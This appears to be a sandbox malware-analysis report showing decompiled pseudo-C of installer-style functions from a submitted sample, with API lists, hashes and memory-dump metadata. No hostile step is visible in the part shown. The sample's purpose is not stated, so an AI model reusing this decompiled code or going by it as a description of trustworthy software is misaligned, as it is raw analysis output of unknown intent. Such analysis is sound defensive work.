                    						while(1) {
                    							_t97 = _a16;
                    							if(_a16 >= _t87) {
                    								_t97 = _t87;
                    							}
                    							if(E004034AC(0x793700, _t97) == 0) {
                    								goto L41;
                    							}
                    							_t69 = E004060BC(_a8, 0x793700, _t97); // executed
                    							if(_t69 == 0) {
                    								L28:
                    								_push(0xfffffffe);
                    								L42:
                    								_pop(_t65);
                    								return _t65;
                    							}
                    							_v8 = _v8 + _t97;
                    							_a16 = _a16 - _t97;
                    							if(_a16 > 0) {
                    								continue;
                    							}
                    							goto L44;
                    						}
                    						goto L41;
                    					}
                    					_t70 = GetTickCount();
                    					 *0x40ce58 =  *0x40ce58 & 0x00000000;
                    					_t14 =  &_a16;
                    					 *_t14 = _a16 & 0x7fffffff;
                    					_v20 = _t70;
                    					 *0x40ce40 = 0xb;
                    					_a4 = _a16;
                    					if( *_t14 <= 0) {
                    						goto L44;
                    					} else {
                    						goto L9;
                    					}
                    					while(1) {
                    						L9:
                    						_t98 = 0x4000;
                    						if(_a16 < 0x4000) {
                    							_t98 = _a16;
                    						}
                    						if(E004034AC(0x793700, _t98) == 0) {
                    							goto L41;
                    						}
                    						_a16 = _a16 - _t98;
                    						 *0x40ce30 = 0x793700;
                    						 *0x40ce34 = _t98;
                    						while(1) {
                    							_t94 = _v16;
                    							 *0x40ce38 = _t94;
                    							 *0x40ce3c = _v12;
                    							_t74 = E00406A42(0x40ce30);
                    							_v24 = _t74;
                    							if(_t74 < 0) {
                    								break;
                    							}
                    							_t99 =  *0x40ce38; // 0x79bd28
                    							_t100 = _t99 - _t94;
                    							_t75 = GetTickCount();
                    							_t95 = _t75;
                    							if(( *0x7a8b14 & 0x00000001) != 0 && (_t75 - _v20 > 0xc8 || _a16 == 0)) {
                    								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                    								_t101 = _t101 + 0xc;
                    								E0040557C(0,  &_v152); // executed
                    								_v20 = _t95;
                    							}
                    							if(_t100 == 0) {
                    								if(_a16 > 0) {
                    									goto L9;
                    								}
                    								goto L44;
                    							} else {
                    								if(_a12 != 0) {
                    									_t76 =  *0x40ce38; // 0x79bd28
                    									_v8 = _v8 + _t100;
                    									_v12 = _v12 - _t100;
                    									_v16 = _t76;
                    									L23:
                    									if(_v24 != 4) {
                    										continue;
                    									}
                    									goto L44;
                    								}
                    								_t77 = E004060BC(_a8, _v16, _t100); // executed
                    								if(_t77 == 0) {
                    									goto L28;
                    								}
                    								_v8 = _v8 + _t100;
                    								goto L23;
                    							}
                    						}
                    						_push(0xfffffffc);
                    						goto L42;
                    					}
                    					goto L41;
                    				}
                    			}


























                    0x004032bf
                    0x004032c3
                    0x004032c6
                    0x004032cb
                    0x004032cd
                    0x004032cd
                    0x004032d4
                    0x004032d8
                    0x004032dd
                    0x004032df
                    0x004032df
                    0x004032e6
                    0x004032eb
                    0x004032f6
                    0x004032f6
                    0x00403308
                    0x0040349a
                    0x0040349a
                    0x00000000
                    0x0040330e
                    0x00403312
                    0x00403447
                    0x0040348a
                    0x0040348c
                    0x0040348c
                    0x00403498
                    0x0040349f
                    0x004034a2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403498
                    0x0040344c
                    0x00000000
                    0x00000000
                    0x0040344e
                    0x00403451
                    0x00403454
                    0x00403457
                    0x00403459
                    0x00403459
                    0x00403469
                    0x00000000
                    0x00000000
                    0x00403470
                    0x00403477
                    0x00403441
                    0x00403441
                    0x0040349c
                    0x0040349c
                    0x00000000
                    0x0040349c
                    0x00403479
                    0x0040347c
                    0x00403483
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403485
                    0x00000000
                    0x00403451
                    0x0040331e
                    0x00403320
                    0x00403327
                    0x00403327
                    0x0040332e
                    0x00403334
                    0x0040333b
                    0x0040333e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403344
                    0x00403344
                    0x00403344
                    0x0040334c
                    0x0040334e
                    0x0040334e
                    0x0040335f
                    0x00000000
                    0x00000000
                    0x00403365
                    0x00403368
                    0x0040336e
                    0x00403374
                    0x00403374
                    0x0040337f
                    0x00403385
                    0x0040338a
                    0x00403391
                    0x00403394
                    0x00000000
                    0x00000000
                    0x0040339a
                    0x004033a0
                    0x004033a2
                    0x004033ab
                    0x004033ad
                    0x004033de
                    0x004033e4
                    0x004033f0
                    0x004033f5
                    0x004033f5
                    0x004033fa
                    0x00403435
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004033fc
                    0x00403400
                    0x00403417
                    0x0040341c
                    0x0040341f
                    0x00403422
                    0x00403425
                    0x00403429
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040342f
                    0x00403409
                    0x00403410
                    0x00000000
                    0x00000000
                    0x00403412
                    0x00000000
                    0x00403412
                    0x004033fa
                    0x0040343d
                    0x00000000
                    0x0040343d
                    0x00000000
                    0x00403344

                    APIs
                    • GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 0040331E
                    • GetTickCount.KERNEL32(0040CE30,00793700,00004000), ref: 004033A2
                    • MulDiv.KERNEL32 ref: 004033CB
                    • wsprintfW.USER32 ref: 004033DE
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: CountTick$wsprintf
                    • String ID: ... %d%%$Z8@
                    • API String ID: 551687249-843941321
                    • Opcode ID: 25d0c7491c7920abd27f2f6fef4c2f9f733347eed01cbf64b6988d1fc6eca9be
                    • Instruction ID: 2eef5f2140e491494c2db8857c7661a7403dfcbdcc622e4f150acafc5917097d
                    • Opcode Fuzzy Hash: 25d0c7491c7920abd27f2f6fef4c2f9f733347eed01cbf64b6988d1fc6eca9be
                    • Instruction Fuzzy Hash: 59516C71800219EBDB11DF55DA84B9E7FB8AF40326F14417BE814BA2C1D7789F408BAA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 856 40557c-405591 857 405597-4055a8 856->857 858 405648-40564c 856->858 859 4055b3-4055bf lstrlenW 857->859 860 4055aa-4055ae call 406557 857->860 862 4055c1-4055d1 lstrlenW 859->862 863 4055dc-4055e0 859->863 860->859 862->858 864 4055d3-4055d7 lstrcatW 862->864 865 4055e2-4055e9 SetWindowTextW 863->865 866 4055ef-4055f3 863->866 864->863 865->866 867 4055f5-405637 SendMessageW * 3 866->867 868 405639-40563b 866->868 867->868 868->858 869 40563d-405640 868->869 869->858
                    C-Code - Quality: 100%
                    			E0040557C(signed int _a4, WCHAR* _a8) {
                    				struct HWND__* _v8;
                    				signed int _v12;
                    				WCHAR* _v32;
                    				long _v44;
                    				int _v48;
                    				void* _v52;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				WCHAR* _t27;
                    				signed int _t28;
                    				long _t29;
                    				signed int _t37;
                    				signed int _t38;
                    
                    				_t27 =  *0x7a7a44;
                    				_v8 = _t27;
                    				if(_t27 != 0) {
                    					_t37 =  *0x7a8b14;
                    					_v12 = _t37;
                    					_t38 = _t37 & 0x00000001;
                    					if(_t38 == 0) {
                    						E00406557(_t38, 0, 0x7a0f28, 0x7a0f28, _a4);
                    					}
                    					_t27 = lstrlenW(0x7a0f28);
                    					_a4 = _t27;
                    					if(_a8 == 0) {
                    						L6:
                    						if((_v12 & 0x00000004) == 0) {
                    							_t27 = SetWindowTextW( *0x7a7a28, 0x7a0f28); // executed
                    						}
                    						if((_v12 & 0x00000002) == 0) {
                    							_v32 = 0x7a0f28;
                    							_v52 = 1;
                    							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
                    							_v44 = 0;
                    							_v48 = _t29 - _t38;
                    							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
                    							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
                    						}
                    						if(_t38 != 0) {
                    							_t28 = _a4;
                    							0x7a0f28[_t28] = 0;
                    							return _t28;
                    						}
                    					} else {
                    						_t27 = lstrlenW(_a8) + _a4;
                    						if(_t27 < 0x1000) {
                    							_t27 = lstrcatW(0x7a0f28, _a8);
                    							goto L6;
                    						}
                    					}
                    				}
                    				return _t27;
                    			}

















                    0x00405582
                    0x0040558c
                    0x00405591
                    0x00405597
                    0x004055a2
                    0x004055a5
                    0x004055a8
                    0x004055ae
                    0x004055ae
                    0x004055b4
                    0x004055bc
                    0x004055bf
                    0x004055dc
                    0x004055e0
                    0x004055e9
                    0x004055e9
                    0x004055f3
                    0x004055fc
                    0x00405608
                    0x0040560f
                    0x00405613
                    0x00405616
                    0x00405629
                    0x00405637
                    0x00405637
                    0x0040563b
                    0x0040563d
                    0x00405640
                    0x00000000
                    0x00405640
                    0x004055c1
                    0x004055c9
                    0x004055d1
                    0x004055d7
                    0x00000000
                    0x004055d7
                    0x004055d1
                    0x004055bf
                    0x0040564c

                    APIs
                    • lstrlenW.KERNEL32(007A0F28,00000000,0079BD28,7555110C,?,?,?,?,?,?,?,?,?,004033F5,00000000,?), ref: 004055B4
                    • lstrlenW.KERNEL32(004033F5,007A0F28,00000000,0079BD28,7555110C,?,?,?,?,?,?,?,?,?,004033F5,00000000), ref: 004055C4
                    • lstrcatW.KERNEL32 ref: 004055D7
                    • SetWindowTextW.USER32 ref: 004055E9
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040560F
                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405629
                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405637
                      • Part of subcall function 00406557: lstrcatW.KERNEL32 ref: 004066FC
                      • Part of subcall function 00406557: lstrlenW.KERNEL32(Call,00000000,007A0F28,?,004055B3,007A0F28,00000000), ref: 00406756
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: MessageSendlstrlen$lstrcat$TextWindow
                    • String ID:
                    • API String ID: 1495540970-0
                    • Opcode ID: 4220885725f682886bacb0d0991f91d3f85cd1758724983fd30707fe453943de
                    • Instruction ID: aa9a416d1108715588902b7fd38edda494bf3b6dcc64e7638c7e5b3a5377cb21
                    • Opcode Fuzzy Hash: 4220885725f682886bacb0d0991f91d3f85cd1758724983fd30707fe453943de
                    • Instruction Fuzzy Hash: F7218071900518BACF119F69ED449CFBF79EF49750F10803AF944B62A0C7794A40CFA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 870 406877-406897 GetSystemDirectoryW 871 406899 870->871 872 40689b-40689d 870->872 871->872 873 4068ae-4068b0 872->873 874 40689f-4068a8 872->874 876 4068b1-4068e4 wsprintfW LoadLibraryExW 873->876 874->873 875 4068aa-4068ac 874->875 875->876
                    C-Code - Quality: 100%
                    			E00406877(intOrPtr _a4) {
                    				short _v576;
                    				signed int _t13;
                    				struct HINSTANCE__* _t17;
                    				signed int _t19;
                    				void* _t24;
                    
                    				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                    				if(_t13 > 0x104) {
                    					_t13 = 0;
                    				}
                    				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                    					_t19 = 1;
                    				} else {
                    					_t19 = 0;
                    				}
                    				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                    				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                    				return _t17;
                    			}








                    0x0040688e
                    0x00406897
                    0x00406899
                    0x00406899
                    0x0040689d
                    0x004068b0
                    0x004068aa
                    0x004068aa
                    0x004068aa
                    0x004068c9
                    0x004068dd
                    0x004068e4

                    APIs
                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040688E
                    • wsprintfW.USER32 ref: 004068C9
                    • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068DD
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: DirectoryLibraryLoadSystemwsprintf
                    • String ID: %s%S.dll$UXTHEME$\
                    • API String ID: 2200240437-1946221925
                    • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                    • Instruction ID: cdb972a85fe13f574061c7118b8c5d4b466341d866a79bb5796beb4354b5a6e3
                    • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                    • Instruction Fuzzy Hash: E9F0F671511119A7DF10BB64DD0DF9B376CAF00305F11447AAA46F10E0EB7CDA68CBA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 877 405a4b-405a96 CreateDirectoryW 878 405a98-405a9a 877->878 879 405a9c-405aa9 GetLastError 877->879 880 405ac3-405ac5 878->880 879->880 881 405aab-405abf SetFileSecurityW 879->881 881->878 882 405ac1 GetLastError 881->882 882->880
                    C-Code - Quality: 100%
                    			E00405A4B(WCHAR* _a4) {
                    				struct _SECURITY_ATTRIBUTES _v16;
                    				struct _SECURITY_DESCRIPTOR _v36;
                    				int _t22;
                    				long _t23;
                    
                    				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                    				_v36.Owner = 0x4083f8;
                    				_v36.Group = 0x4083f8;
                    				_v36.Sacl = _v36.Sacl & 0x00000000;
                    				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                    				_v16.lpSecurityDescriptor =  &_v36;
                    				_v36.Revision = 1;
                    				_v36.Control = 4;
                    				_v36.Dacl = 0x4083e8;
                    				_v16.nLength = 0xc;
                    				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                    				if(_t22 != 0) {
                    					L1:
                    					return 0;
                    				}
                    				_t23 = GetLastError();
                    				if(_t23 == 0xb7) {
                    					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                    						goto L1;
                    					}
                    					return GetLastError();
                    				}
                    				return _t23;
                    			}







                    0x00405a56
                    0x00405a5a
                    0x00405a5d
                    0x00405a63
                    0x00405a67
                    0x00405a6b
                    0x00405a73
                    0x00405a7a
                    0x00405a80
                    0x00405a87
                    0x00405a8e
                    0x00405a96
                    0x00405a98
                    0x00000000
                    0x00405a98
                    0x00405aa2
                    0x00405aa9
                    0x00405abf
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405ac1
                    0x00405ac5

                    APIs
                    • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A8E
                    • GetLastError.KERNEL32 ref: 00405AA2
                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405AB7
                    • GetLastError.KERNEL32 ref: 00405AC1
                    Strings
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A71
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                    • String ID: C:\Users\user\AppData\Local\Temp\
                    • API String ID: 3449924974-4017390910
                    • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                    • Instruction ID: 6b4cde1861b350949670c47dbaa51c368922036badf300449d23a0f4a4187d7a
                    • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                    • Instruction Fuzzy Hash: D0010871D10219EADF109BA0C984BEFBFB4EB04314F04853AD545B6180D77896488FA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 883 734f1817-734f1856 call 734f1bff 887 734f185c-734f1860 883->887 888 734f1976-734f1978 883->888 889 734f1869-734f1876 call 734f2480 887->889 890 734f1862-734f1868 call 734f243e 887->890 895 734f1878-734f187d 889->895 896 734f18a6-734f18ad 889->896 890->889 899 734f187f-734f1880 895->899 900 734f1898-734f189b 895->900 897 734f18af-734f18cb call 734f2655 call 734f1654 call 734f1312 GlobalFree 896->897 898 734f18cd-734f18d1 896->898 921 734f1925-734f1929 897->921 904 734f191e-734f1924 call 734f2655 898->904 905 734f18d3-734f191c call 734f1666 call 734f2655 898->905 902 734f1888-734f1889 call 734f2b98 899->902 903 734f1882-734f1883 899->903 900->896 906 734f189d-734f189e call 734f2e23 900->906 917 734f188e 902->917 910 734f1885-734f1886 903->910 911 734f1890-734f1896 call 734f2810 903->911 904->921 905->921 914 734f18a3 906->914 910->896 910->902 920 734f18a5 911->920 914->920 917->914 920->896 926 734f192b-734f1939 call 734f2618 921->926 927 734f1966-734f196d 921->927 933 734f193b-734f193e 926->933 934 734f1951-734f1958 926->934 927->888 929 734f196f-734f1970 GlobalFree 927->929 929->888 933->934 935 734f1940-734f1948 933->935 934->927 936 734f195a-734f1965 call 734f15dd 934->936 935->934 937 734f194a-734f194b FreeLibrary 935->937 936->927 937->934
                    C-Code - Quality: 88%
                    			E734F1817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                    				void _v36;
                    				char _v136;
                    				struct HINSTANCE__* _t37;
                    				intOrPtr _t42;
                    				void* _t48;
                    				void* _t49;
                    				void* _t50;
                    				void* _t54;
                    				intOrPtr _t57;
                    				signed int _t61;
                    				signed int _t63;
                    				void* _t67;
                    				void* _t68;
                    				void* _t72;
                    				void* _t76;
                    
                    				_t76 = __esi;
                    				_t68 = __edi;
                    				_t67 = __edx;
                    				 *0x734f506c = _a8;
                    				 *0x734f5070 = _a16;
                    				 *0x734f5074 = _a12;
                    				 *((intOrPtr*)(_a20 + 0xc))( *0x734f5048, E734F1651);
                    				_push(1); // executed
                    				_t37 = E734F1BFF(); // executed
                    				_t54 = _t37;
                    				if(_t54 == 0) {
                    					L28:
                    					return _t37;
                    				} else {
                    					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                    						E734F243E(_t54);
                    					}
                    					_push(_t54);
                    					E734F2480(_t67);
                    					_t57 =  *((intOrPtr*)(_t54 + 4));
                    					if(_t57 == 0xffffffff) {
                    						L14:
                    						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
                    							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                    								_push(_t54);
                    								_t37 = E734F2655();
                    							} else {
                    								_push(_t76);
                    								_push(_t68);
                    								_t61 = 8;
                    								_t13 = _t54 + 0x1018; // 0x1018
                    								memcpy( &_v36, _t13, _t61 << 2);
                    								_t42 = E734F1666(_t54,  &_v136);
                    								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
                    								_t18 = _t54 + 0x1018; // 0x1018
                    								_t72 = _t18;
                    								_push(_t54);
                    								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
                    								 *_t72 = 4;
                    								E734F2655();
                    								_t63 = 8;
                    								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                    							}
                    						} else {
                    							_push(_t54);
                    							E734F2655();
                    							_t37 = GlobalFree(E734F1312(E734F1654(_t54)));
                    						}
                    						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                    							_t37 = E734F2618(_t54);
                    							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
                    								_t37 =  *(_t54 + 0x1008);
                    								if(_t37 != 0) {
                    									_t37 = FreeLibrary(_t37);
                    								}
                    							}
                    							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
                    								_t37 = E734F15DD( *0x734f5068);
                    							}
                    						}
                    						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
                    							goto L28;
                    						} else {
                    							return GlobalFree(_t54);
                    						}
                    					}
                    					_t48 =  *_t54;
                    					if(_t48 == 0) {
                    						if(_t57 != 1) {
                    							goto L14;
                    						}
                    						E734F2E23(_t54);
                    						L12:
                    						_t54 = _t48;
                    						L13:
                    						goto L14;
                    					}
                    					_t49 = _t48 - 1;
                    					if(_t49 == 0) {
                    						L8:
                    						_t48 = E734F2B98(_t57, _t54); // executed
                    						goto L12;
                    					}
                    					_t50 = _t49 - 1;
                    					if(_t50 == 0) {
                    						E734F2810(_t54);
                    						goto L13;
                    					}
                    					if(_t50 != 1) {
                    						goto L14;
                    					}
                    					goto L8;
                    				}
                    			}


















                    0x734f1817
                    0x734f1817
                    0x734f1817
                    0x734f1824
                    0x734f182c
                    0x734f1839
                    0x734f1847
                    0x734f184a
                    0x734f184c
                    0x734f1851
                    0x734f1856
                    0x734f1978
                    0x734f1978
                    0x734f185c
                    0x734f1860
                    0x734f1863
                    0x734f1868
                    0x734f1869
                    0x734f186a
                    0x734f1870
                    0x734f1876
                    0x734f18a6
                    0x734f18ad
                    0x734f18d1
                    0x734f191e
                    0x734f191f
                    0x734f18d3
                    0x734f18d3
                    0x734f18d4
                    0x734f18dd
                    0x734f18de
                    0x734f18e8
                    0x734f18eb
                    0x734f18f0
                    0x734f18f7
                    0x734f18f7
                    0x734f18fd
                    0x734f18fe
                    0x734f1904
                    0x734f190a
                    0x734f1917
                    0x734f1918
                    0x734f191b
                    0x734f18af
                    0x734f18af
                    0x734f18b0
                    0x734f18c5
                    0x734f18c5
                    0x734f1929
                    0x734f192c
                    0x734f1939
                    0x734f1940
                    0x734f1948
                    0x734f194b
                    0x734f194b
                    0x734f1948
                    0x734f1958
                    0x734f1960
                    0x734f1965
                    0x734f1958
                    0x734f196d
                    0x00000000
                    0x734f196f
                    0x00000000
                    0x734f1970
                    0x734f196d
                    0x734f187a
                    0x734f187d
                    0x734f189b
                    0x00000000
                    0x00000000
                    0x734f189e
                    0x734f18a3
                    0x734f18a3
                    0x734f18a5
                    0x00000000
                    0x734f18a5
                    0x734f187f
                    0x734f1880
                    0x734f1888
                    0x734f1889
                    0x00000000
                    0x734f1889
                    0x734f1882
                    0x734f1883
                    0x734f1891
                    0x00000000
                    0x734f1891
                    0x734f1886
                    0x00000000
                    0x00000000
                    0x00000000
                    0x734f1886

                    APIs
                      • Part of subcall function 734F1BFF: GlobalFree.KERNEL32(?), ref: 734F1E74
                      • Part of subcall function 734F1BFF: GlobalFree.KERNEL32(?), ref: 734F1E79
                      • Part of subcall function 734F1BFF: GlobalFree.KERNEL32(?), ref: 734F1E7E
                    • GlobalFree.KERNEL32(00000000), ref: 734F18C5
                    • FreeLibrary.KERNEL32(?), ref: 734F194B
                    • GlobalFree.KERNEL32(00000000), ref: 734F1970
                      • Part of subcall function 734F243E: GlobalAlloc.KERNEL32(00000040,?), ref: 734F246F
                      • Part of subcall function 734F2810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,734F1896,00000000), ref: 734F28E0
                      • Part of subcall function 734F1666: wsprintfW.USER32 ref: 734F1694
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1159305311.00000000734F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 734F0000, based on PE: true
                    • Associated: 00000004.00000002.1159300360.00000000734F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000004.00000002.1159309786.00000000734F4000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000004.00000002.1159313695.00000000734F6000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_734f0000_vbc.jbxd
                    Similarity
                    • API ID: Global$Free$Alloc$Librarywsprintf
                    • String ID:
                    • API String ID: 3962662361-3916222277
                    • Opcode ID: f4aa0f7c9f0489e4ae492ae03759b1d2c527aa83a6eadd22a49edea80f9966f4
